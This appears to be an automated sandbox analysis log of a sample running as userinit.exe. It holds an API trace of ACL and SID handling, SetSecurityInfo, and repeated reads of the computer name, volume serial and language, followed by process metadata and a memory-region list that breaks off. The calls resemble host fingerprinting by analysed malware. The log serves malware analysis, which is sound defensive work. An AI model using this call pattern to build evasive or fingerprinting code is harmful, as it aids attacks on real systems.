[0201.386] IsValidSid (pSid=0x2a529c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0201.386] ConvertSidToStringSidA () returned 0x1
[0201.386] LocalFree (hMem=0xb7018) returned 0x0
[0201.386] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0201.386] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0201.386] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0xb0f28, lpbSaclPresent=0x22e5f4, pSacl=0x22e5e8, lpbSaclDefaulted=0x22e5ec | out: lpbSaclPresent=0x22e5f4, pSacl=0x22e5e8, lpbSaclDefaulted=0x22e5ec) returned 1
[0201.386] LocalFree (hMem=0xb0f28) returned 0x0
[0201.387] IsValidSid (pSid=0x2a5f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0201.387] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0201.387] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0201.387] GetLengthSid (pSid=0x2a5f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0201.387] GetLastError () returned 0x0
[0201.387] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0201.387] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0201.387] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0201.387] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0201.387] InitializeAcl (in: pAcl=0xb7fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0xb7fa8) returned 1
[0201.387] IsValidSid (pSid=0x2a5f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0201.387] GetLengthSid (pSid=0x2a5f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0201.387] GetLastError () returned 0x0
[0201.387] IsValidSid (pSid=0x2a5f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0201.387] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0201.388] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0201.388] SetLastError (dwErrCode=0x0)
[0201.388] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0201.388] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0201.388] GetSidSubAuthorityCount (pSid=0x2a5f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a5f615
[0201.388] GetLastError () returned 0x0
[0201.388] IsValidSid (pSid=0x2a5f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0201.388] SetLastError (dwErrCode=0x0)
[0201.388] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0201.388] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0201.388] GetSidIdentifierAuthority (pSid=0x2a5f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a5f616
[0201.388] GetLastError () returned 0x0
[0201.388] IsValidSid (pSid=0x2a5f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0201.388] IsValidSid (pSid=0x2a5f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0201.388] SetLastError (dwErrCode=0x0)
[0201.388] GetSidSubAuthorityCount (pSid=0x2a5f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a5f615
[0201.388] GetLastError () returned 0x0
[0201.388] SetLastError (dwErrCode=0x0)
[0201.388] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0201.389] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0201.389] GetSidSubAuthority (pSid=0x2a5f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x2a5f61c
[0201.389] GetLastError () returned 0x0
[0201.389] IsValidSid (pSid=0x2a5f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0201.389] GetLengthSid (pSid=0x2a5f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0201.389] GetLastError () returned 0x0
[0201.389] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0201.389] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0201.389] AddAce (in: pAcl=0xb7fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0xa2f90, nAceListLength=0x14 | out: pAcl=0xb7fa8) returned 1
[0201.389] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0201.389] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0201.389] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0201.390] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0201.390] SetSecurityInfo () returned 0x0
[0201.390] CloseHandle (hObject=0x1d0) returned 1
[0201.390] GetComputerNameA (in: lpBuffer=0x2a5fd84, nSize=0x22e8bc | out: lpBuffer="CRH2YWU7", nSize=0x22e8bc) returned 1
[0201.390] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e7a8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0201.390] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22e8a4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22e8b8, lpMaximumComponentLength=0x22e8b4, lpFileSystemFlags=0x22e8b0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22e8b8*=0x90c08a66, lpMaximumComponentLength=0x22e8b4*=0xff, lpFileSystemFlags=0x22e8b0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0201.390] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e7b0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0201.391] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22e8a4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22e8b8, lpMaximumComponentLength=0x22e8b4, lpFileSystemFlags=0x22e8b0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22e8b8*=0x90c08a66, lpMaximumComponentLength=0x22e8b4*=0xff, lpFileSystemFlags=0x22e8b0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0201.391] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e7b0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0201.391] VirtualAlloc (lpAddress=0x2a60000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a60000
[0201.391] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22e8a4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22e8b8, lpMaximumComponentLength=0x22e8b4, lpFileSystemFlags=0x22e8b0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22e8b8*=0x90c08a66, lpMaximumComponentLength=0x22e8b4*=0xff, lpFileSystemFlags=0x22e8b0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0201.391] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e7a8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0201.391] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22e8a4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22e8b8, lpMaximumComponentLength=0x22e8b4, lpFileSystemFlags=0x22e8b0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22e8b8*=0x90c08a66, lpMaximumComponentLength=0x22e8b4*=0xff, lpFileSystemFlags=0x22e8b0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0201.391] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e7a8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0201.392] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22e8a4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22e8b8, lpMaximumComponentLength=0x22e8b4, lpFileSystemFlags=0x22e8b0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22e8b8*=0x90c08a66, lpMaximumComponentLength=0x22e8b4*=0xff, lpFileSystemFlags=0x22e8b0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0201.392] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e7a8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0201.392] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22e8a4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22e8b8, lpMaximumComponentLength=0x22e8b4, lpFileSystemFlags=0x22e8b0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22e8b8*=0x90c08a66, lpMaximumComponentLength=0x22e8b4*=0xff, lpFileSystemFlags=0x22e8b0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0201.392] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e7a8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0201.392] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22e8a4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22e8b8, lpMaximumComponentLength=0x22e8b4, lpFileSystemFlags=0x22e8b0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22e8b8*=0x90c08a66, lpMaximumComponentLength=0x22e8b4*=0xff, lpFileSystemFlags=0x22e8b0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0201.392] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e7a8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0201.392] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22e8a4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22e8b8, lpMaximumComponentLength=0x22e8b4, lpFileSystemFlags=0x22e8b0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22e8b8*=0x90c08a66, lpMaximumComponentLength=0x22e8b4*=0xff, lpFileSystemFlags=0x22e8b0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0201.392] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e7a8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0201.393] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22e8a4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22e8b8, lpMaximumComponentLength=0x22e8b4, lpFileSystemFlags=0x22e8b0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22e8b8*=0x90c08a66, lpMaximumComponentLength=0x22e8b4*=0xff, lpFileSystemFlags=0x22e8b0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0201.393] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e7a8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0201.393] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22e8a4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22e8b8, lpMaximumComponentLength=0x22e8b4, lpFileSystemFlags=0x22e8b0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22e8b8*=0x90c08a66, lpMaximumComponentLength=0x22e8b4*=0xff, lpFileSystemFlags=0x22e8b0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0201.393] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e7a8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0201.393] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22e8a4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22e8b8, lpMaximumComponentLength=0x22e8b4, lpFileSystemFlags=0x22e8b0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22e8b8*=0x90c08a66, lpMaximumComponentLength=0x22e8b4*=0xff, lpFileSystemFlags=0x22e8b0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0201.393] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e7a8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0201.393] GetSystemDefaultLangID () returned 0x90409
[0201.393] VerLanguageNameA (in: wLang=0x409, szLang=0x22e85c, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0201.394] ExitProcess (uExitCode=0x0)
Thread:
id = 342
os_tid = 0x8c4
Thread:
id = 343
os_tid = 0x8cc
Process:
id = "54"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be980"
os_pid = "0x980"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "24"
os_parent_pid = "0xf0c"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 6498
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 6499
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 6500
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 6501
start_va = 0xd0000
end_va = 0x10ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 6502
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 6503
start_va = 0x800000
end_va = 0x808fff
entry_point = 0x800000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 6504
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 6505
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 6506
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 6507
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 6508
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 6510
start_va = 0x120000
end_va = 0x21ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000120000"
filename = ""
Region:
id = 6511
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 6512
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 6513
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 6514
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 6515
start_va = 0x2b0000
end_va = 0x2bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 6516
start_va = 0x6d740000
end_va = 0x6d7c3fff
entry_point = 0x6d740000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 6517
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 6518
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 6519
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 6520
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 6521
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 6522
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 6523
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 6524
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 6525
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 6526
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 6527
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 6528
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 6529
start_va = 0x2c0000
end_va = 0x387fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002c0000"
filename = ""
Region:
id = 6530
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 6531
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 6538
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 6539
start_va = 0xc0000
end_va = 0xc0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 6540
start_va = 0x470000
end_va = 0x570fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 6541
start_va = 0x630000
end_va = 0x63ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000630000"
filename = ""
Region:
id = 6542
start_va = 0x810000
end_va = 0x140ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000810000"
filename = ""
Region:
id = 6543
start_va = 0x640000
end_va = 0x73ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 6544
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 6545
start_va = 0x1410000
end_va = 0x14fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6549
start_va = 0x1500000
end_va = 0x15defff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001500000"
filename = ""
Region:
id = 6550
start_va = 0x110000
end_va = 0x110fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 6551
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 6552
start_va = 0x740000
end_va = 0x7fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 6553
start_va = 0x15e0000
end_va = 0x1f0ffff
entry_point = 0x15e0000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 6554
start_va = 0x220000
end_va = 0x226fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000220000"
filename = ""
Region:
id = 6555
start_va = 0x230000
end_va = 0x231fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000230000"
filename = ""
Region:
id = 6556
start_va = 0x1f10000
end_va = 0x2302fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001f10000"
filename = ""
Region:
id = 6557
start_va = 0x580000
end_va = 0x5fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 6558
start_va = 0x2310000
end_va = 0x241cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002310000"
filename = ""
Region:
id = 6561
start_va = 0x2420000
end_va = 0x251ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002420000"
filename = ""
Region:
id = 6565
start_va = 0x2520000
end_va = 0x271ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002520000"
filename = ""
Region:
id = 6566
start_va = 0x1410000
end_va = 0x1490fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6567
start_va = 0x14c0000
end_va = 0x14fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000014c0000"
filename = ""
Region:
id = 6571
start_va = 0x2720000
end_va = 0x27a2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6572
start_va = 0x1410000
end_va = 0x1494fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6573
start_va = 0x2720000
end_va = 0x27a6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6574
start_va = 0x1410000
end_va = 0x1498fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6578
start_va = 0x2720000
end_va = 0x27aafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6579
start_va = 0x1410000
end_va = 0x149cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6582
start_va = 0x2720000
end_va = 0x27aefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6583
start_va = 0x1410000
end_va = 0x14a0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6584
start_va = 0x2720000
end_va = 0x27b2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6585
start_va = 0x1410000
end_va = 0x14a4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6586
start_va = 0x2720000
end_va = 0x27b6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 6590
start_va = 0x1410000
end_va = 0x14a8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
